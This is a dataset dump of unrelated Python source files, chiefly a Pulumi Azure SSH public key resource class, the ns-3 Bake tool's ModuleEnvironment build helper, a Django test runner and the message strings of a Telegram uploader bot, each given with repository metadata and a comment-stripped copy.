self.utils.get_driver_name() in ('ios', 'iphone') def is_mobile_test(self): return self.is_android_test() or self.is_ios_test() def is_web_test(self): appium_browser_name = self.config.get_optional('AppiumCapabilities', 'browserName') return not self.is_mobile_test() or appium_browser_name not in (None, '') def is_android_web_test(self): return self.is_android_test() and self.is_web_test() def is_ios_web_test(self): return self.is_ios_test() and self.is_web_test() def is_maximizable(self): return not self.is_mobile_test() def should_reuse_driver(self, scope, test_passed, context=None): reuse_driver = self.config.getboolean_optional('Driver', 'reuse_driver') reuse_driver_session = self.config.getboolean_optional('Driver', 'reuse_driver_session') restart_driver_after_failure = (self.config.getboolean_optional('Driver', 'restart_driver_after_failure') or self.config.getboolean_optional('Driver', 'restart_driver_fail')) if context and scope == 'function': reuse_driver = reuse_driver or (hasattr(context, 'reuse_driver_from_tags') and context.reuse_driver_from_tags) return (((reuse_driver and scope == 'function') or (reuse_driver_session and scope != 'session')) and (test_passed or not restart_driver_after_failure)) def get_driver_platform(self): platform = '' if 'platform' in self.driver.desired_capabilities: platform = self.driver.desired_capabilities['platform'] elif 'platformName' in self.driver.desired_capabilities: platform = self.driver.desired_capabilities['platformName'] return platform
true
true
f72900502ab88493c523bb3da0c4a24be5629b00
6,081
py
Python
sdk/python/pulumi_azure_nextgen/compute/latest/ssh_public_key.py
test-wiz-sec/pulumi-azure-nextgen
20a695af0d020b34b0f1c336e1b69702755174cc
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_nextgen/compute/latest/ssh_public_key.py
test-wiz-sec/pulumi-azure-nextgen
20a695af0d020b34b0f1c336e1b69702755174cc
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_nextgen/compute/latest/ssh_public_key.py
test-wiz-sec/pulumi-azure-nextgen
20a695af0d020b34b0f1c336e1b69702755174cc
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables __all__ = ['SshPublicKey'] class SshPublicKey(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, location: Optional[pulumi.Input[str]] = None, public_key: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, ssh_public_key_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None, __name__=None, __opts__=None): """ Specifies information about the SSH public key. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] location: Resource location :param pulumi.Input[str] public_key: SSH public key used to authenticate to a virtual machine through ssh. If this property is not initially provided when the resource is created, the publicKey property will be populated when generateKeyPair is called. If the public key is provided upon resource creation, the provided public key needs to be at least 2048-bit and in ssh-rsa format. :param pulumi.Input[str] resource_group_name: The name of the resource group. :param pulumi.Input[str] ssh_public_key_name: The name of the SSH public key. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() if location is None: raise TypeError("Missing required property 'location'") __props__['location'] = location __props__['public_key'] = public_key if resource_group_name is None: raise TypeError("Missing required property 'resource_group_name'") __props__['resource_group_name'] = resource_group_name if ssh_public_key_name is None: raise TypeError("Missing required property 'ssh_public_key_name'") __props__['ssh_public_key_name'] = ssh_public_key_name __props__['tags'] = tags __props__['name'] = None __props__['type'] = None alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/v20191201:SshPublicKey"), pulumi.Alias(type_="azure-nextgen:compute/v20200601:SshPublicKey")]) opts = pulumi.ResourceOptions.merge(opts, alias_opts) super(SshPublicKey, __self__).__init__( 'azure-nextgen:compute/latest:SshPublicKey', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'SshPublicKey': """ Get an existing SshPublicKey resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() return SshPublicKey(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def location(self) -> pulumi.Output[str]: """ Resource location """ return pulumi.get(self, "location") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ Resource name """ return pulumi.get(self, "name") @property @pulumi.getter(name="publicKey") def public_key(self) -> pulumi.Output[Optional[str]]: """ SSH public key used to authenticate to a virtual machine through ssh. If this property is not initially provided when the resource is created, the publicKey property will be populated when generateKeyPair is called. If the public key is provided upon resource creation, the provided public key needs to be at least 2048-bit and in ssh-rsa format. """ return pulumi.get(self, "public_key") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Resource tags """ return pulumi.get(self, "tags") @property @pulumi.getter def type(self) -> pulumi.Output[str]: """ Resource type """ return pulumi.get(self, "type") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
43.748201
391
0.650222
import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables __all__ = ['SshPublicKey'] class SshPublicKey(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, location: Optional[pulumi.Input[str]] = None, public_key: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, ssh_public_key_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None, __name__=None, __opts__=None): if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() if location is None: raise TypeError("Missing required property 'location'") __props__['location'] = location __props__['public_key'] = public_key if resource_group_name is None: raise TypeError("Missing required property 'resource_group_name'") __props__['resource_group_name'] = resource_group_name if ssh_public_key_name is None: raise TypeError("Missing required property 'ssh_public_key_name'") __props__['ssh_public_key_name'] = ssh_public_key_name __props__['tags'] = tags __props__['name'] = None __props__['type'] = None alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/v20191201:SshPublicKey"), pulumi.Alias(type_="azure-nextgen:compute/v20200601:SshPublicKey")]) opts = pulumi.ResourceOptions.merge(opts, alias_opts) super(SshPublicKey, __self__).__init__( 'azure-nextgen:compute/latest:SshPublicKey', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'SshPublicKey': opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() return SshPublicKey(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def location(self) -> pulumi.Output[str]: return pulumi.get(self, "location") @property @pulumi.getter def name(self) -> pulumi.Output[str]: return pulumi.get(self, "name") @property @pulumi.getter(name="publicKey") def public_key(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "public_key") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: return pulumi.get(self, "tags") @property @pulumi.getter def type(self) -> pulumi.Output[str]: return pulumi.get(self, "type") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
true
true
f729008890b8db3dc09657c2381c73eda7e9edb9
20,265
py
Python
ns-allinone-3.35/bake/bake/ModuleEnvironment.py
usi-systems/cc
487aa9e322b2b01b6af3a92e38545c119e4980a3
[ "Apache-2.0" ]
null
null
null
ns-allinone-3.35/bake/bake/ModuleEnvironment.py
usi-systems/cc
487aa9e322b2b01b6af3a92e38545c119e4980a3
[ "Apache-2.0" ]
null
null
null
ns-allinone-3.35/bake/bake/ModuleEnvironment.py
usi-systems/cc
487aa9e322b2b01b6af3a92e38545c119e4980a3
[ "Apache-2.0" ]
1
2019-10-23T15:15:27.000Z
2019-10-23T15:15:27.000Z
############################################################################### # Copyright (c) 2013 INRIA # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation; # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # Authors: Daniel Camara <daniel.camara@inria.fr> # Mathieu Lacage <mathieu.lacage@sophia.inria.fr> ############################################################################### ''' ModuleEnvironment.py This file stores the class Module Environment responsible for the interaction between Bake and the execution of third party softwares and the operating system. ''' import os import subprocess import sys import platform from bake.Exceptions import TaskError from bake.Utils import ColorTool class ModuleEnvironment: ''' Main class to interact with the host system to execute the external tools. ''' _stopOnError = False _libpaths = set([]) _binpaths = set([]) _pkgpaths = set([]) _variables = set([]) (HIGHER, LOWER, EQUAL) = range(0,3) def __init__(self, logger, installdir, sourcedir, objdir, debug=False): ''' Internal variables initialization.''' self._logger = logger self._installdir = installdir self._sourcedir = sourcedir self._objdir = objdir self._module_name = None self._module_dir = None self._module_supports_objdir = None # self._libpaths = set([]) # self._binpaths = set([]) # self._pkgpaths = set([]) # self._variables = set([]) self._debug = debug self._sudoEnabled = False def _module_directory(self): ''' Returns the name of the directory of the on use module.''' if not self._module_dir : return self._module_name return self._module_dir @property def installdir(self): ''' Returns the name of the set installation directory.''' return self._installdir @property def debug(self): ''' Returns if this execution was set to show the debug messages or not.''' return self._debug @property def srcdir(self): ''' Returns the directory where Bake stores the source of the present module. ''' try: return os.path.join(self._sourcedir, self._module_directory()) except AttributeError as e: raise TaskError('Missing configuration: sourcedir= %s, ' 'module_directory= %s, Error: %s' % (self._sourcedir,self._module_directory(), e)) @property def srcrepo(self): ''' The root of the source repository, where all the sources for all the modules will be stored. ''' return self._sourcedir @property def objdir(self): ''' Returns the directory where Bake stores the object code of the present module. ''' if not self._module_supports_objdir: obj = self.srcdir else: try: obj = os.path.join(self.srcdir, self._objdir) except AttributeError as e: raise TaskError('Missing configuration: sourcedir= %s, ' 'objdir= %s, Error: %s' % (self._sourcedir, self._module_directory(), e)) return obj @property def sudoEnabled(self): ''' Returns the setting of the --sudo option''' return self._sudoEnabled @property def stopOnErrorEnabled(self): ''' Returns the setting of the --stop_on_error option''' return ModuleEnvironment._stopOnError def _pkgconfig_var(self): ''' Returns the PKG_CONFIG_PATH configured environment variable.''' return 'PKG_CONFIG_PATH' def _pkgconfig_path(self): ''' Returns the PKG_CONFIG_PATH configured path. ''' return os.path.join(self._lib_path(), 'pkgconfig') def _lib_var(self): ''' Returns the value of the system configured library path.''' lib_var = {'Linux' : 'LD_LIBRARY_PATH', 'FreeBSD' : 'LD_LIBRARY_PATH', 'Darwin' : 'DYLD_LIBRARY_PATH', 'Windows' : 'PATH'} if not platform.system() in lib_var: sys.stderr('Error: Unsupported platform. Send email to ' 'bake_support@inria.fr (%s)' % platform.system()) sys.exit(1) return lib_var[platform.system()] def _lib_path(self): ''' Returns the value of the library path for the in-use module.''' return os.path.join(self._installdir, 'lib') def _bin_var(self): return 'PATH' def _bin_path(self): ''' Returns the value of the binary path for the in-use module.''' return os.path.join(self._installdir, 'bin') def _py_var(self): return 'PYTHONPATH' def _py_path(self): ''' Returns the value of the python path for the in-use module.''' return os.path.join(self._installdir, 'lib', 'python'+platform.python_version_tuple()[0]+ '.'+platform.python_version_tuple()[1], 'site-packages') def _append_path(self, d, name, value, sep): ''' Append the variable to the system in use configuration. ''' if not name in d: d[name] = value else: d[name] = d[name] + sep + value def start_source(self, name, dir): ''' Sets the environment to be used by the given source module.''' assert self._module_supports_objdir is None self._module_name = name self._module_dir = dir self._logger.set_current_module(name) # ensure source directory exists if not os.path.isdir(self._sourcedir): os.makedirs(self._sourcedir) def end_source(self): ''' Cleans the environment regarding the informations of the last used source module. ''' self._module_name = None self._module_dir = None self._logger.clear_current_module() def start_build(self, name, dir, supports_objdir): ''' Sets the environment to be used by the given build module.''' # assert self._module_supports_objdir is None self._module_name = name self._module_dir = dir self._module_supports_objdir = supports_objdir self._logger.set_current_module(name) if not os.path.isdir(self.installdir): os.makedirs(self.installdir) if not os.path.isdir(self.objdir): os.makedirs(self.objdir) def end_build(self): ''' Cleans the environment regarding the informations of the last used build module. ''' self._module_name = None self._module_dir = None self._module_supports_objdir = None self._logger.clear_current_module() def exist_file(self, file): ''' Finds if the file exists in the path.''' return os.path.exists(file) def path_list(self): ''' Return path that will be searched for executables ''' pythonpath=[] if os.environ.get('PYTHONPATH'): pythonpath=os.environ.get('PYTHONPATH').split(os.pathsep) return os.environ.get('PATH').split(os.pathsep) + [self._bin_path()] + pythonpath def _program_location(self, program): ''' Finds where the executable is located in the user's path.''' # function to verify if the program exists on the given path # and if it is executable def is_exe(path): return os.path.exists(path) and os.access(path, os.X_OK) path, name = os.path.split(program) # if the path for the executable was passed as part of its name if path: if is_exe(program): return program else: # for all the directories in the path search for the executable for path in self.path_list(): exe_file = os.path.join(path, program) if is_exe(exe_file): return exe_file toFindIn=None # search for libs with that name on the library path index=program.find(".so") + program.find(".a") if index>0 : toFindIn=['/usr/lib','/usr/lib64','/usr/lib32','/usr/local/lib', '/lib','/opt/local/lib','/opt/local/Library', '/usr/local/opt'] for libpath in self._libpaths: toFindIn.append(libpath) stdLibs = [] try: libPath = os.environ[self._lib_var()] if libPath: stdLibs=libPath.split(os.pathsep) except: pass tofindIn=toFindIn+stdLibs+[self._lib_path()] elif program.endswith(".h"): toFindIn=['/usr/include', '/usr/local/include', '/usr/lib','/opt/local/include', '/usr/local/opt'] if toFindIn : for eachdir in toFindIn: if sys.platform == "darwin": # enable symlink walking for MacOS only (bug 2975) for dirname, dirnames, filenames in os.walk(eachdir, True, None, True): for filename in filenames: if filename==name: return os.path.join(dirname, filename) else: for dirname, dirnames, filenames in os.walk(eachdir): for filename in filenames: if filename==name: return os.path.join(dirname, filename) return None def _check_version(self, found, required, match_type): ''' Checks the version of the required executable.''' smallerSize=min(len(found),len(required)) if match_type == self.HIGHER: for i in range(0,smallerSize): if not found[i]: return False if int(found[i]) < int(required[i]): return False elif int(found[i]) > int(required[i]): return True return True elif match_type == self.LOWER: for i in range(0,smallerSize): if not found[i]: return True if int(found[i]) > int(required[i]): return False elif int(found[i]) < int(required[i]): return True if len(found) >= len(required): return False return True elif match_type == self.EQUAL: if len(found) != len(required): return False for i in range(0,smallerSize): if int(found[i]) != int(required[i]): return False return True else: assert False def add_libpaths(self, libpaths): ''' Adds the list of paths to the in-use library path environment variable. ''' for element in libpaths : self._libpaths.add(self.replace_variables(element)) def add_binpaths(self, libpaths): ''' Adds the list of paths to the in-use binary path environment variable. ''' for element in libpaths : self._binpaths.add(self.replace_variables(element)) def add_pkgpaths(self, libpaths): ''' Adds the list of paths to the in-use package path environment variable. ''' for element in libpaths : self._pkgpaths.add(self.replace_variables(element)) def add_variables(self, libpaths): ''' Adds/replace the list of variables to the in-use set of environment variables. ''' for element in libpaths : self._variables.add(self.replace_variables(element)) def create_environment_file(self, fileName): ''' Creates the set environment file to help users to call the Bake built modules. ''' script = "#!/bin/bash \n#### \n# Environment setting script. Automatically generated by Bake\n####\n\n" script = script + "if [ \"${BASH_SOURCE:-}\" == \"${0}\" ]; then \n" + \ " echo \"> Call with . bakeSetEnv.sh or source bakeSetEnv.sh\" \n" + \ " exit 1 \n" + \ "fi \n\n" self._binpaths.add(self._bin_path()) if os.path.isdir(self._lib_path()): self._libpaths.add(self._lib_path()) if os.path.isdir(self._lib_path()+'64'): self._libpaths.add(self._lib_path()+'64') if len(self._libpaths) > 0: script = script + self.add_onPath("LD_LIBRARY_PATH", self._libpaths) + "\n" if len(self._binpaths) > 0: script = script + self.add_onPath("PATH", self._binpaths) + "\n" if len(self._pkgpaths) > 0: script = script + self.add_onPath("PKG_CONFIG_PATH", self._pkgpaths) + "\n" from distutils.sysconfig import get_python_lib localLibPath='' libDir=get_python_lib() if libDir: begin=libDir.lower().index('python') localLibPath=os.path.join(self._lib_path(),libDir[begin:]) script = script + self.add_onPath("PYTHONPATH", [sys.path[0],self._lib_path(),localLibPath]) + "\n" for element in self._variables: script = script + " export " + element + "\n" fout = open(fileName, "w") fout.write(script) fout.close() os.chmod(fileName, 0o755) return script def add_onPath (self, variableName, vectorPath): ''' Format the variable to be added on the system. ''' returnString = " export " + variableName + "=\"${" + variableName + ":+${" + variableName + "}:}" for element in vectorPath: returnString = returnString + element + ":" # Strip extra ':' returnString = returnString[:-1] returnString = returnString + "\"" return returnString def replace_variables(self, string): ''' Replace the variables on the string, if they exist, by their system real values. ''' import re tmp = string tmp = re.sub('\$INSTALLDIR', self.installdir, tmp) tmp = re.sub('\$OBJDIR', self.objdir, tmp) tmp = re.sub('\$SRCDIR', self.srcdir, tmp) return tmp def check_program(self, program, version_arg = None, version_regexp = None, version_required = None, match_type=HIGHER): '''Checks if the program, with the desired version, exists in the system. ''' if self._program_location(program) is None: return False if version_arg is None and version_regexp is None and version_required is None: return True else: # This assert as it was avoided the checking of the version of the # executable assert not (version_arg is None or version_regexp is # None or version_required is None) assert not (version_arg is None and version_regexp is None and version_required is None) popen = subprocess.Popen([self._program_location(program), version_arg], stdout = subprocess.PIPE, stderr = subprocess.STDOUT) (out, err) = popen.communicate('') import re reg = re.compile(version_regexp) for line in out.splitlines(): m = reg.search(line) if not m is None: found = m.groups() return self._check_version(found, version_required, match_type) def append_to_path(self, env_vars): """Sets the library and binary paths.""" for libpath in self._libpaths: self._append_path(env_vars, self._lib_var(), libpath, os.pathsep) if self.debug: print(" -> " + self._lib_var() + " " + libpath + " ") self._append_path(env_vars, self._lib_var(), self._lib_path(), os.pathsep) for libpath in self._binpaths: self._append_path(env_vars, self._bin_var(), libpath, os.pathsep) if self.debug: print(" -> " + self._bin_var() + " " + libpath + " ") self._append_path(env_vars, self._bin_var(), self._bin_path(), os.pathsep) for libpath in self._pkgpaths: self._append_path(env_vars, self._pkgconfig_var(), libpath, os.pathsep) if self.debug: print(" -> " + self._pkgconfig_var() + " " + libpath + " ") self._append_path(env_vars, self._pkgconfig_var(), self._pkgconfig_path(), os.pathsep) self._append_path(env_vars, self._py_var(), self._py_path(), os.pathsep) self._append_path(env_vars, self._py_var(), os.path.join(self._installdir, 'lib'), os.pathsep) return env_vars def run(self, args, directory = None, env = dict(), interactive = False): '''Executes a system program adding the libraries and over the correct directories. ''' if not interactive: env_string = '' if len(env) != 0: env_string = ' '.join([a + '=' + b for a,b in env.items()]) try: args_string = ' '.join(args) except TypeError as e: raise TaskError('Wrong argument type: %s, expected string,' ' error: %s' % (str(args), e)) self._logger.commands.write(env_string + ' ' + args_string + ' dir=' + str(directory) + '\n') stdin = None stdout = self._logger.stdout stderr = self._logger.stderr else: stdin = sys.stdin stdout = sys.stdout stderr = sys.stderr tmp = dict(list(os.environ.items()) + list(env.items())) # sets the library and binary paths tmp = self.append_to_path(tmp) # Calls the third party executable with the whole context try: popen = subprocess.Popen(args, stdin = stdin, stdout = stdout, stderr = stderr, cwd = directory, env = tmp) except Exception as e: raise TaskError('could not execute: %s %s. \nUnexpected error: %s' % (str(directory), str(args), str(e))) # Waits for the full execution of the third party software retcode = popen.wait() if retcode != 0: raise TaskError('Subprocess failed with error %d: %s' % (retcode, str(args)))
37.320442
116
0.540785
Libs+[self._lib_path()] elif program.endswith(".h"): toFindIn=['/usr/include', '/usr/local/include', '/usr/lib','/opt/local/include', '/usr/local/opt'] if toFindIn : for eachdir in toFindIn: if sys.platform == "darwin": for dirname, dirnames, filenames in os.walk(eachdir, True, None, True): for filename in filenames: if filename==name: return os.path.join(dirname, filename) else: for dirname, dirnames, filenames in os.walk(eachdir): for filename in filenames: if filename==name: return os.path.join(dirname, filename) return None def _check_version(self, found, required, match_type): smallerSize=min(len(found),len(required)) if match_type == self.HIGHER: for i in range(0,smallerSize): if not found[i]: return False if int(found[i]) < int(required[i]): return False elif int(found[i]) > int(required[i]): return True return True elif match_type == self.LOWER: for i in range(0,smallerSize): if not found[i]: return True if int(found[i]) > int(required[i]): return False elif int(found[i]) < int(required[i]): return True if len(found) >= len(required): return False return True elif match_type == self.EQUAL: if len(found) != len(required): return False for i in range(0,smallerSize): if int(found[i]) != int(required[i]): return False return True else: assert False def add_libpaths(self, libpaths): for element in libpaths : self._libpaths.add(self.replace_variables(element)) def add_binpaths(self, libpaths): for element in libpaths : self._binpaths.add(self.replace_variables(element)) def add_pkgpaths(self, libpaths): for element in libpaths : self._pkgpaths.add(self.replace_variables(element)) def add_variables(self, libpaths): for element in libpaths : self._variables.add(self.replace_variables(element)) def create_environment_file(self, fileName): script = "#!/bin/bash \n#### \n# Environment setting script. Automatically generated by Bake\n####\n\n" script = script + "if [ \"${BASH_SOURCE:-}\" == \"${0}\" ]; then \n" + \ " echo \"> Call with . bakeSetEnv.sh or source bakeSetEnv.sh\" \n" + \ " exit 1 \n" + \ "fi \n\n" self._binpaths.add(self._bin_path()) if os.path.isdir(self._lib_path()): self._libpaths.add(self._lib_path()) if os.path.isdir(self._lib_path()+'64'): self._libpaths.add(self._lib_path()+'64') if len(self._libpaths) > 0: script = script + self.add_onPath("LD_LIBRARY_PATH", self._libpaths) + "\n" if len(self._binpaths) > 0: script = script + self.add_onPath("PATH", self._binpaths) + "\n" if len(self._pkgpaths) > 0: script = script + self.add_onPath("PKG_CONFIG_PATH", self._pkgpaths) + "\n" from distutils.sysconfig import get_python_lib localLibPath='' libDir=get_python_lib() if libDir: begin=libDir.lower().index('python') localLibPath=os.path.join(self._lib_path(),libDir[begin:]) script = script + self.add_onPath("PYTHONPATH", [sys.path[0],self._lib_path(),localLibPath]) + "\n" for element in self._variables: script = script + " export " + element + "\n" fout = open(fileName, "w") fout.write(script) fout.close() os.chmod(fileName, 0o755) return script def add_onPath (self, variableName, vectorPath): returnString = " export " + variableName + "=\"${" + variableName + ":+${" + variableName + "}:}" for element in vectorPath: returnString = returnString + element + ":" # Strip extra ':' returnString = returnString[:-1] returnString = returnString + "\"" return returnString def replace_variables(self, string): import re tmp = string tmp = re.sub('\$INSTALLDIR', self.installdir, tmp) tmp = re.sub('\$OBJDIR', self.objdir, tmp) tmp = re.sub('\$SRCDIR', self.srcdir, tmp) return tmp def check_program(self, program, version_arg = None, version_regexp = None, version_required = None, match_type=HIGHER): if self._program_location(program) is None: return False if version_arg is None and version_regexp is None and version_required is None: return True else: assert not (version_arg is None and version_regexp is None and version_required is None) popen = subprocess.Popen([self._program_location(program), version_arg], stdout = subprocess.PIPE, stderr = subprocess.STDOUT) (out, err) = popen.communicate('') import re reg = re.compile(version_regexp) for line in out.splitlines(): m = reg.search(line) if not m is None: found = m.groups() return self._check_version(found, version_required, match_type) def append_to_path(self, env_vars): for libpath in self._libpaths: self._append_path(env_vars, self._lib_var(), libpath, os.pathsep) if self.debug: print(" -> " + self._lib_var() + " " + libpath + " ") self._append_path(env_vars, self._lib_var(), self._lib_path(), os.pathsep) for libpath in self._binpaths: self._append_path(env_vars, self._bin_var(), libpath, os.pathsep) if self.debug: print(" -> " + self._bin_var() + " " + libpath + " ") self._append_path(env_vars, self._bin_var(), self._bin_path(), os.pathsep) for libpath in self._pkgpaths: self._append_path(env_vars, self._pkgconfig_var(), libpath, os.pathsep) if self.debug: print(" -> " + self._pkgconfig_var() + " " + libpath + " ") self._append_path(env_vars, self._pkgconfig_var(), self._pkgconfig_path(), os.pathsep) self._append_path(env_vars, self._py_var(), self._py_path(), os.pathsep) self._append_path(env_vars, self._py_var(), os.path.join(self._installdir, 'lib'), os.pathsep) return env_vars def run(self, args, directory = None, env = dict(), interactive = False): if not interactive: env_string = '' if len(env) != 0: env_string = ' '.join([a + '=' + b for a,b in env.items()]) try: args_string = ' '.join(args) except TypeError as e: raise TaskError('Wrong argument type: %s, expected string,' ' error: %s' % (str(args), e)) self._logger.commands.write(env_string + ' ' + args_string + ' dir=' + str(directory) + '\n') stdin = None stdout = self._logger.stdout stderr = self._logger.stderr else: stdin = sys.stdin stdout = sys.stdout stderr = sys.stderr tmp = dict(list(os.environ.items()) + list(env.items())) tmp = self.append_to_path(tmp) try: popen = subprocess.Popen(args, stdin = stdin, stdout = stdout, stderr = stderr, cwd = directory, env = tmp) except Exception as e: raise TaskError('could not execute: %s %s. \nUnexpected error: %s' % (str(directory), str(args), str(e))) retcode = popen.wait() if retcode != 0: raise TaskError('Subprocess failed with error %d: %s' % (retcode, str(args)))
true
true
f729009d866d7d8781b0cb23a905d6c759bb4150
1,307
py
Python
runtests.py
solarmonkey/django-taggit-serializer
ed33bd44e0b5b903af9cb32c8b10236c7cd3a925
[ "BSD-3-Clause" ]
203
2015-02-23T19:29:46.000Z
2022-02-23T09:27:59.000Z
runtests.py
adriangzz/dj-taggit-serializer
88386daa9c981231de8be12cff032e7711dfdc4e
[ "BSD-3-Clause" ]
50
2015-03-18T01:37:49.000Z
2022-01-31T20:42:28.000Z
runtests.py
adriangzz/dj-taggit-serializer
88386daa9c981231de8be12cff032e7711dfdc4e
[ "BSD-3-Clause" ]
54
2015-03-08T17:23:54.000Z
2022-03-19T11:34:25.000Z
import sys try: from django.conf import settings settings.configure( DEBUG=True, USE_TZ=True, DATABASES={ "default": { "ENGINE": "django.db.backends.sqlite3", } }, ROOT_URLCONF="taggit_serializer.urls", INSTALLED_APPS=[ "django.contrib.auth", "django.contrib.contenttypes", "django.contrib.sites", "rest_framework", "taggit", 'nose', "django_nose", "taggit_serializer", "tests", ], SITE_ID=1, NOSE_ARGS=['-s'], MIDDLEWARE_CLASSES=[], ) try: import django setup = django.setup except AttributeError: pass else: setup() from django_nose import NoseTestSuiteRunner except ImportError: import traceback traceback.print_exc() raise ImportError("To fix this error, run: pip install -r requirements-test.txt") def run_tests(*test_args): if not test_args: test_args = ['tests'] # Run tests test_runner = NoseTestSuiteRunner(verbosity=0) failures = test_runner.run_tests(test_args) if failures: sys.exit(failures) if __name__ == '__main__': run_tests(*sys.argv[1:])
21.783333
85
0.560061
import sys try: from django.conf import settings settings.configure( DEBUG=True, USE_TZ=True, DATABASES={ "default": { "ENGINE": "django.db.backends.sqlite3", } }, ROOT_URLCONF="taggit_serializer.urls", INSTALLED_APPS=[ "django.contrib.auth", "django.contrib.contenttypes", "django.contrib.sites", "rest_framework", "taggit", 'nose', "django_nose", "taggit_serializer", "tests", ], SITE_ID=1, NOSE_ARGS=['-s'], MIDDLEWARE_CLASSES=[], ) try: import django setup = django.setup except AttributeError: pass else: setup() from django_nose import NoseTestSuiteRunner except ImportError: import traceback traceback.print_exc() raise ImportError("To fix this error, run: pip install -r requirements-test.txt") def run_tests(*test_args): if not test_args: test_args = ['tests'] test_runner = NoseTestSuiteRunner(verbosity=0) failures = test_runner.run_tests(test_args) if failures: sys.exit(failures) if __name__ == '__main__': run_tests(*sys.argv[1:])
true
true
f72901b0081120b8e5043dcc98793760f0fa0a8f
862
py
Python
translation.py
Mahmud8421/TGraph-Bot
c2228074206f49ec65b2c2ea7f146fd756be7427
[ "MIT" ]
null
null
null
translation.py
Mahmud8421/TGraph-Bot
c2228074206f49ec65b2c2ea7f146fd756be7427
[ "MIT" ]
null
null
null
translation.py
Mahmud8421/TGraph-Bot
c2228074206f49ec65b2c2ea7f146fd756be7427
[ "MIT" ]
null
null
null
class Translation(object): START_TEXT = """<b>Hai {}!!!</b> <code>Im Simple Telegraph Uploader Bot😜</code> <b>» You Must Join My Updates Channel for using me</b> <i>Click Help Button For More Details</i>""" HELP_TEXT = """<b>Hey {}!!!,Please Folow these Steps</b> ➥ <code>Send any Image, Gif or Video(Mp4 Only) below 5MB.</code> ➥ <code>Bot will send you the Telegra.ph link.</code> <b>Available Commands</b> /start - <b>Checking Bot Online</b> /help - <b>How To Use Me</b> /about - <b>More About Me</b>""" ABOUT_TEXT = """**➥ My Name** : ```Telegraph Bot``` **➥ Creator** : <a href=https://t.me/D_ar_k_Angel>Dark Angel</a> **➥ Credits** : ```Everyone in this journey``` **➥ Language** : ```Python3``` **➥ Library** : <a href=https://docs.pyrogram.org>Pyrogram asyncio 0.18.0</a> **➥ Server** : ```Heroku``` **➥ Build Status** : ```V01.1 [BETA]```"""
45.368421
77
0.61949
